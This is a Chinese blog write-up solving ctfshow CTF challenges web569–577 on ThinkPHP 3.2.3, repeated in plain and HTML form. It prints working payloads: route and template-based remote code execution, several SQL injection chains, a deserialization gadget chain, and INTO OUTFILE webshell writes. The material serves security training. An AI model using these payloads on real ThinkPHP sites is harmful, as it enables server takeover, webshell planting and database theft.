ctfshow thinkphp部分wp

博主： xiaolong
发布时间：2021 年 10 月 19 日
777 次浏览
暂无评论
221字数
分类：技术

跟着师傅们的wp和thinkphp3.2.3官方手册开始受苦之旅。

web569

/index.php/admin/login/ctfshowlogin

web570

在Common/Conf/config.php中有call_user_func

<?php
return array(
    .
    .
    .
    'URL_ROUTER_ON'   => true, 
    'URL_ROUTE_RULES' => array(
    'ctfshow/:f/:a' =>function($f,$a){
        call_user_func($f, $a);
        }
    )
);

尝试/index.php/ctfshow/system/ls发现可以，但不能出现/，所以换种方式

/index.php/ctfshow/assert/assert($_POST[1])

在这里插入图片描述

web571

Application\Home\Controller\IndexController.class.php

<?php
namespace Home\Controller;
use Think\Controller;
class IndexController extends Controller {
    public function index($n=''){
        $this->show('<style type="text/css">*{ padding: 0; margin: 0; } div{ padding: 4px 48px;} body{ background: #fff; font-family: "微软雅黑"; color: #333;font-size:24px} h1{ font-size: 100px; font-weight: normal; margin-bottom: 12px; } p{ line-height: 1.8em; font-size: 36px } a,a:hover{color:blue;}</style><div style="padding: 24px 48px;"> <h1>CTFshow</h1><p>thinkphp 专项训练</p><p>hello,'.$n.'黑客建立了控制器后门，你能找到吗</p>','utf-8');
    }

}

自己下个tp3.2.3调试一下

在这里插入图片描述

题目的TMPL_ENGINE_TYPE为php(这我不知道是怎么判断出来的)，所以会进入这个if语句，执行eval('?>' . $_content)，而$_content包含了我们传入的值，因此可以命令执行

?n=<?php system('cat /flag_is_here');?>

web572

爆破日志文件
/Application/Runtime/Logs/Home/21_04_15.log

在这里插入图片描述

/index.php?showctf=<?php%20system(%27cat%20/flag_is_here%27);?>

web573

thinkphp3.2.3 SQL注入漏洞复现

Thinkphp3 漏洞总结

正常传?id=xxx的话，会进入_parseType()，在这里面如果id列为int，则直接intval，varchar则转义单引号，因此无法注入
而传入的是数组的话不会进入_parseType()，会进入think_filter函数

function think_filter(&$value){
    // TODO 其他安全过滤

    // 过滤查询特殊字符
    if(preg_match('/^(EXP|NEQ|GT|EGT|LT|ELT|OR|XOR|LIKE|NOTLIKE|NOT BETWEEN|NOTBETWEEN|BETWEEN|NOTIN|NOT IN|IN)$/i',$value)){
        $value .= ' ';
    }
}

最终直接拼接到sql语句，造成注入

?id[where]=id=0 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()%23
?id[where]=id=0 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='flags'%23
?id[where]=id=0 union select 1,group_concat(flag4s),3,4 from flags%23

web574

where后面加了个括号 where(id=1)这样
因此手动闭合就好

?id=0)union select 1,group_concat(flag4s),3,4 from flags%23

或者直接报错注入

?id=1 and updatexml(1,concat(0x7e,(select group_concat(flag4s) from flags),0x7e),1)

web575

$user= unserialize(base64_decode(cookie('user')));
if(!$user || $user->id!==$id){
$user = M('Users');
$user->find(intval($id));
cookie('user',base64_encode(serialize($user->data())));
}
$this->show($user->username);
}

根据web571，知道show()可以执行php代码，所以解法1就是不进这个if

<?php
namespace Home\Controller;

class IndexController
{
    public $id = '1';
    public $username = "<?php system('cat /f*');?>";

}

echo base64_encode(serialize(new IndexController()));

在这里插入图片描述

解法2是thiniphp3.2.3的反序列化
ctfshow ThinkPHP篇575
跟着审了一遍，感觉迷迷糊糊的，可能状态不是很好，poc看不太懂

<?php
namespace Think\Image\Driver{
    use Think\Session\Driver\Memcache;
    class Imagick{
        private $img;
        public function __construct(){
            $this->img=new Memcache();
        }
    }
}
namespace Think\Session\Driver{
    use Think\Model;
    class Memcache {
        protected $handle;
        public function __construct(){
            $this->handle=new Model();
        }

}
}

namespace Think{
    use Think\Db\Driver\Mysql;
    class Model {
        protected $data = array();
        protected $db = null;
        protected $pk;
        public function __construct(){
            $this->db=new Mysql();
            $this->pk='id';
            $this->data[$this->pk] = array(
                "table" => 'mysql.user;select "<?php eval($_POST[1]);?>" into outfile "/var/www/html/a.php"# ',
                "where" => "1"
            );
        }
    }
}
namespace Think\Db\Driver{
    use PDO;
    class Mysql{
        protected $options = array(
            PDO::MYSQL_ATTR_LOCAL_INFILE => true,    // 开启才能读取文件
            PDO::MYSQL_ATTR_MULTI_STATEMENTS => true //开启堆叠,发现不加这句话也可以
        );
        protected $config     = array(
        "debug"             =>   1,
        'hostname'          =>  '127.0.0.1', // 服务器地址
        'database'          =>  'ctfshow',          // 数据库名
        'username'          =>  'root',      // 用户名
        'password'          =>  'root',          // 密码
        'hostport'          =>  '3306'
        );              
    }
}
namespace{
    use Think\Image\Driver\Imagick;
    echo base64_encode(serialize(new Imagick()));
}

这个漏洞还能配合MySQL恶意服务端读取客户端文件漏洞，不过我看不懂

web576

$user = M('Users')->comment($id)->find(intval($id));

在这里插入图片描述

最终拼接在注释中

在这里插入图片描述

因此可以构造?id=*/select xxx%23 闭合注释
但不能联合查询，因为union在limit后面的话，需要union的前后都套上括号，这里显然不行
这里需要into outfile写马

SELECT 
    [ALL | DISTINCT | DISTINCTROW ] 
      [HIGH_PRIORITY] 
      [STRAIGHT_JOIN] 
      [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT] 
      [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS] 
    select_expr [, select_expr ...] 
    [FROM table_references 
    [WHERE where_condition] 
    [GROUP BY {col_name | expr | position} 
      [ASC | DESC], ... [WITH ROLLUP]] 
    [HAVING where_condition] 
    [ORDER BY {col_name | expr | position} 
      [ASC | DESC], ...] 
    [LIMIT {[offset,] row_count | row_count OFFSET offset}] 
    [PROCEDURE procedure_name(argument_list)] 
    [INTO OUTFILE 'file_name' export_options 
      | INTO DUMPFILE 'file_name' 
      | INTO var_name [, var_name]] 
    [FOR UPDATE | LOCK IN SHARE MODE]]

SELECT ... INTO OUTFILE 'file_name'
        [CHARACTER SET charset_name]
        [export_options]

export_options:
    [{FIELDS | COLUMNS}
        [TERMINATED BY 'string']//分隔符
        [[OPTIONALLY] ENCLOSED BY 'char']
        [ESCAPED BY 'char']
    ]
    [LINES
        [STARTING BY 'string']
        [TERMINATED BY 'string']
    ]

“OPTION”参数为可选参数选项，其可能的取值有：

`FIELDS TERMINATED BY '字符串'`：设置字符串为字段之间的分隔符，可以为单个或多个字符。默认值是“\t”。

`FIELDS ENCLOSED BY '字符'`：设置字符来括住字段的值，只能为单个字符。默认情况下不使用任何符号。

`FIELDS OPTIONALLY ENCLOSED BY '字符'`：设置字符来括住CHAR、VARCHAR和TEXT等字符型字段。默认情况下不使用任何符号。

`FIELDS ESCAPED BY '字符'`：设置转义字符，只能为单个字符。默认值为“\”。

`LINES STARTING BY '字符串'`：设置每行数据开头的字符，可以为单个或多个字符。默认情况下不使用任何字符。

`LINES TERMINATED BY '字符串'`：设置每行数据结尾的字符，可以为单个或多个字符。默认值是“\n”。

信息搜集能力很重要，我都不知道这些是怎么搜到，我就没搜到，直接搬了wp中的

?id=1*/into outfile "/var/www/html/2.php" LINES STARTING BY '<?php eval($_POST[0]);?>'%23

web577

$map=array(
'id'=>$_GET['id']
);
$user = M('Users')->where($map)->find();

依旧是之前的tp3sql注入漏洞

?id[0]=exp&id[1]==-1 union select 1,flag4s,3,4 from flags

最后修改：2023 年 12 月 15 日

如果觉得我的文章对你有用，请随意赞赏

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

评论 *

私密评论

名称 *

🎲

邮箱 *

地址

hqthvjwkya
博主太厉害了！
wsneyhelpl
真好呢
快帆云
你好，我们的机场：快帆云，已经稳定运营三年多，现在诚邀推广员。...
无名博客
你好，请问封面图片可以借图吗？
无名博客
okok

ctfshow thinkphp部分wp

xiaolong • 2021 年 10 月 19 日

<p>跟着师傅们的wp和<span class="external-link"><a class="no-external-link" href="https://www.kancloud.cn/manual/thinkphp/1678" target="_blank"><i data-feather="external-link"></i>thinkphp3.2.3官方手册</a></span>开始受苦之旅。</p><h3>web569</h3><pre><code>/index.php/admin/login/ctfshowlogin</code></pre><hr><h3>web570</h3><p>在<code>Common/Conf/config.php</code>中有<code>call_user_func</code></p><pre><code>&lt;?php
return array(
    .
    .
    .
    'URL_ROUTER_ON'   =&gt; true, 
    'URL_ROUTE_RULES' =&gt; array(
    'ctfshow/:f/:a' =&gt;function($f,$a){
        call_user_func($f, $a);
        }
    )
);</code></pre><p>尝试<code>/index.php/ctfshow/system/ls</code>发现可以，但不能出现<code>/</code>，所以换种方式</p><pre><code>/index.php/ctfshow/assert/assert($_POST[1])</code></pre><p><img src="https://qiuniu.xiaolong22333.top/fa46ed49af80453aacc69c474ec6b78c.png" alt="在这里插入图片描述" title="在这里插入图片描述" style=""></p><hr><h3>web571</h3><p><code>Application\Home\Controller\IndexController.class.php</code></p><pre><code>&lt;?php
namespace Home\Controller;
use Think\Controller;
class IndexController extends Controller {
    public function index($n=''){
        $this-&gt;show('&lt;style type=&quot;text/css&quot;&gt;*{ padding: 0; margin: 0; } div{ padding: 4px 48px;} body{ background: #fff; font-family: &quot;微软雅黑&quot;; color: #333;font-size:24px} h1{ font-size: 100px; font-weight: normal; margin-bottom: 12px; } p{ line-height: 1.8em; font-size: 36px } a,a:hover{color:blue;}&lt;/style&gt;&lt;div style=&quot;padding: 24px 48px;&quot;&gt; &lt;h1&gt;CTFshow&lt;/h1&gt;&lt;p&gt;thinkphp 专项训练&lt;/p&gt;&lt;p&gt;hello,'.$n.'黑客建立了控制器后门，你能找到吗&lt;/p&gt;','utf-8');
    }

}</code></pre><p>自己下个tp3.2.3调试一下</p><p><img src="https://qiuniu.xiaolong22333.top/fd34f992f3564bfeba60849584b8870b.png" alt="在这里插入图片描述" title="在这里插入图片描述" style=""></p><p>题目的<code>TMPL_ENGINE_TYPE</code>为<code>php</code>(这我不知道是怎么判断出来的)，所以会进入这个if语句，执行<code>eval('?&gt;' . $_content)</code>，而<code>$_content</code>包含了我们传入的值，因此可以命令执行</p><pre><code>?n=&lt;?php system('cat /flag_is_here');?&gt;</code></pre><hr><h3>web572</h3><p>爆破日志文件<br><code>/Application/Runtime/Logs/Home/21_04_15.log</code></p><p><img src="https://qiuniu.xiaolong22333.top/bfbf5f16ef744829bb7ab6d140673c72.png" alt="在这里插入图片描述" title="在这里插入图片描述" style=""></p><pre><code>/index.php?showctf=&lt;?php%20system(%27cat%20/flag_is_here%27);?&gt;</code></pre><hr><h3>web573</h3><p><span class="external-link"><a class="no-external-link" href="https://blog.csdn.net/rfrder/article/details/114024426?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522161927626616780357256379%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=161927626616780357256379&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_v2~rank_v29-9-114024426.pc_v2_rank_blog_default&utm_term=thinkphp" target="_blank"><i data-feather="external-link"></i>thinkphp3.2.3 SQL注入漏洞复现</a></span></p><p><span class="external-link"><a class="no-external-link" href="https://y4er.com/post/thinkphp3-vuln/" target="_blank"><i data-feather="external-link"></i>Thinkphp3 漏洞总结</a></span></p><p>正常传<code>?id=xxx</code>的话，会进入<code>_parseType()</code>，在这里面如果id列为int，则直接intval，varchar则转义单引号，因此无法注入<br>而传入的是数组的话不会进入<code>_parseType()</code>，会进入<code>think_filter</code>函数</p><pre><code>function think_filter(&amp;$value){
    // TODO 其他安全过滤

// 过滤查询特殊字符
    if(preg_match('/^(EXP|NEQ|GT|EGT|LT|ELT|OR|XOR|LIKE|NOTLIKE|NOT BETWEEN|NOTBETWEEN|BETWEEN|NOTIN|NOT IN|IN)$/i',$value)){
        $value .= ' ';
    }
}</code></pre><p>最终直接拼接到sql语句，造成注入</p><pre><code>?id[where]=id=0 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()%23
?id[where]=id=0 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='flags'%23
?id[where]=id=0 union select 1,group_concat(flag4s),3,4 from flags%23</code></pre><hr><h3>web574</h3><p>where后面加了个括号 where(id=1)这样<br>因此手动闭合就好</p><pre><code>?id=0)union select 1,group_concat(flag4s),3,4 from flags%23</code></pre><p>或者直接报错注入</p><pre><code>?id=1 and updatexml(1,concat(0x7e,(select group_concat(flag4s) from flags),0x7e),1)</code></pre><hr><h3>web575</h3><pre><code>$user= unserialize(base64_decode(cookie('user')));
if(!$user || $user-&gt;id!==$id){
$user = M('Users');
$user-&gt;find(intval($id));
cookie('user',base64_encode(serialize($user-&gt;data())));
}
$this-&gt;show($user-&gt;username);
}</code></pre><p>根据web571，知道show()可以执行php代码，所以解法1就是不进这个if</p><pre><code>&lt;?php
namespace Home\Controller;

class IndexController
{
    public $id = '1';
    public $username = &quot;&lt;?php system('cat /f*');?&gt;&quot;;

}

echo base64_encode(serialize(new IndexController()));</code></pre><p><img src="https://qiuniu.xiaolong22333.top/eb5059608301428ab3f6b7bf17903254.png" alt="在这里插入图片描述" title="在这里插入图片描述" style=""></p><p>解法2是thiniphp3.2.3的反序列化<br><span class="external-link"><a class="no-external-link" href="https://blog.csdn.net/miuzzx/article/details/119424101" target="_blank"><i data-feather="external-link"></i>ctfshow ThinkPHP篇575</a></span><br>跟着审了一遍，感觉迷迷糊糊的，可能状态不是很好，poc看不太懂</p><pre><code>&lt;?php
namespace Think\Image\Driver{
    use Think\Session\Driver\Memcache;
    class Imagick{
        private $img;
        public function __construct(){
            $this-&gt;img=new Memcache();
        }
    }
}
namespace Think\Session\Driver{
    use Think\Model;
    class Memcache {
        protected $handle;
        public function __construct(){
            $this-&gt;handle=new Model();
        }

}
}

namespace Think{
    use Think\Db\Driver\Mysql;
    class Model {
        protected $data = array();
        protected $db = null;
        protected $pk;
        public function __construct(){
            $this-&gt;db=new Mysql();
            $this-&gt;pk='id';
            $this-&gt;data[$this-&gt;pk] = array(
                &quot;table&quot; =&gt; 'mysql.user;select &quot;&lt;?php eval($_POST[1]);?&gt;&quot; into outfile &quot;/var/www/html/a.php&quot;# ',
                &quot;where&quot; =&gt; &quot;1&quot;
            );
        }
    }
}
namespace Think\Db\Driver{
    use PDO;
    class Mysql{
        protected $options = array(
            PDO::MYSQL_ATTR_LOCAL_INFILE =&gt; true,    // 开启才能读取文件
            PDO::MYSQL_ATTR_MULTI_STATEMENTS =&gt; true //开启堆叠,发现不加这句话也可以
        );
        protected $config     = array(
        &quot;debug&quot;             =&gt;   1,
        'hostname'          =&gt;  '127.0.0.1', // 服务器地址
        'database'          =&gt;  'ctfshow',          // 数据库名
        'username'          =&gt;  'root',      // 用户名
        'password'          =&gt;  'root',          // 密码
        'hostport'          =&gt;  '3306'
        );              
    }
}
namespace{
    use Think\Image\Driver\Imagick;
    echo base64_encode(serialize(new Imagick()));
}</code></pre><p>这个漏洞还能配合MySQL恶意服务端读取客户端文件漏洞，不过我看不懂</p><hr><h3>web576</h3><pre><code>$user = M('Users')-&gt;comment($id)-&gt;find(intval($id));</code></pre><p><img src="https://qiuniu.xiaolong22333.top/558924897d0b4788936dc9801bda7e31.png" alt="在这里插入图片描述" title="在这里插入图片描述" style=""></p><p>最终拼接在注释中</p><p><img src="https://qiuniu.xiaolong22333.top/b72413d0c0b244deb7e09f66f686d7b9.png" alt="在这里插入图片描述" title="在这里插入图片描述" style=""></p><p>因此可以构造<code>?id=*/select xxx%23</code> 闭合注释<br>但不能联合查询，因为union在limit后面的话，需要union的前后都套上括号，这里显然不行<br>这里需要into outfile写马</p><pre><code>SELECT 
    [ALL | DISTINCT | DISTINCTROW ] 
      [HIGH_PRIORITY] 
      [STRAIGHT_JOIN] 
      [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT] 
      [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS] 
    select_expr [, select_expr ...] 
    [FROM table_references 
    [WHERE where_condition] 
    [GROUP BY {col_name | expr | position} 
      [ASC | DESC], ... [WITH ROLLUP]] 
    [HAVING where_condition] 
    [ORDER BY {col_name | expr | position} 
      [ASC | DESC], ...] 
    [LIMIT {[offset,] row_count | row_count OFFSET offset}] 
    [PROCEDURE procedure_name(argument_list)] 
    [INTO OUTFILE 'file_name' export_options 
      | INTO DUMPFILE 'file_name' 
      | INTO var_name [, var_name]] 
    [FOR UPDATE | LOCK IN SHARE MODE]]
</code></pre><pre><code>SELECT ... INTO OUTFILE 'file_name'
        [CHARACTER SET charset_name]
        [export_options]

export_options:
    [{FIELDS | COLUMNS}
        [TERMINATED BY 'string']//分隔符
        [[OPTIONALLY] ENCLOSED BY 'char']
        [ESCAPED BY 'char']
    ]
    [LINES
        [STARTING BY 'string']
        [TERMINATED BY 'string']
    ]</code></pre><pre><code>“OPTION”参数为可选参数选项，其可能的取值有：

`FIELDS TERMINATED BY '字符串'`：设置字符串为字段之间的分隔符，可以为单个或多个字符。默认值是“\t”。

`FIELDS ENCLOSED BY '字符'`：设置字符来括住字段的值，只能为单个字符。默认情况下不使用任何符号。

`FIELDS OPTIONALLY ENCLOSED BY '字符'`：设置字符来括住CHAR、VARCHAR和TEXT等字符型字段。默认情况下不使用任何符号。

`FIELDS ESCAPED BY '字符'`：设置转义字符，只能为单个字符。默认值为“\”。

`LINES STARTING BY '字符串'`：设置每行数据开头的字符，可以为单个或多个字符。默认情况下不使用任何字符。

`LINES TERMINATED BY '字符串'`：设置每行数据结尾的字符，可以为单个或多个字符。默认值是“\n”。
</code></pre><p>信息搜集能力很重要，我都不知道这些是怎么搜到，我就没搜到，直接搬了wp中的</p><pre><code>?id=1*/into outfile &quot;/var/www/html/2.php&quot; LINES STARTING BY '&lt;?php eval($_POST[0]);?&gt;'%23</code></pre><hr><h3>web577</h3><pre><code>$map=array(
'id'=&gt;$_GET['id']
);
$user = M('Users')-&gt;where($map)-&gt;find();</code></pre><p>依旧是之前的<span class="external-link"><a class="no-external-link" href="https://blog.csdn.net/rfrder/article/details/114024426?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522161927626616780357256379%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=161927626616780357256379&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_v2~rank_v29-9-114024426.pc_v2_rank_blog_default&utm_term=thinkphp" target="_blank"><i data-feather="external-link"></i>tp3sql注入漏洞</a></span></p><pre><code>?id[0]=exp&amp;id[1]==-1 union select 1,flag4s,3,4 from flags</code></pre><hr>

ctfshow thinkphp部分wp

web569

web570

web571

web572

web573

web574

web575

web576

web577

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

BUUCTF刷题记录(持续更新中~)（更新：断更了~~）

这里是文章目录

CTF中非主流PHP文件包含

php死亡exit()绕过

常见的文件头识别和修复

爬虫+fofa批量检测狮子鱼sql注入

docker基础命令入门

简单介绍php反序列化

换主题啦

DASCTF X SU 三月春季挑战赛复现

ctfshow thinkphp部分wp

web569

web570

web571

web572

web573

web574

web575

web576

web577

发表评论 取消回复 使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

ctfshow thinkphp部分wp

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款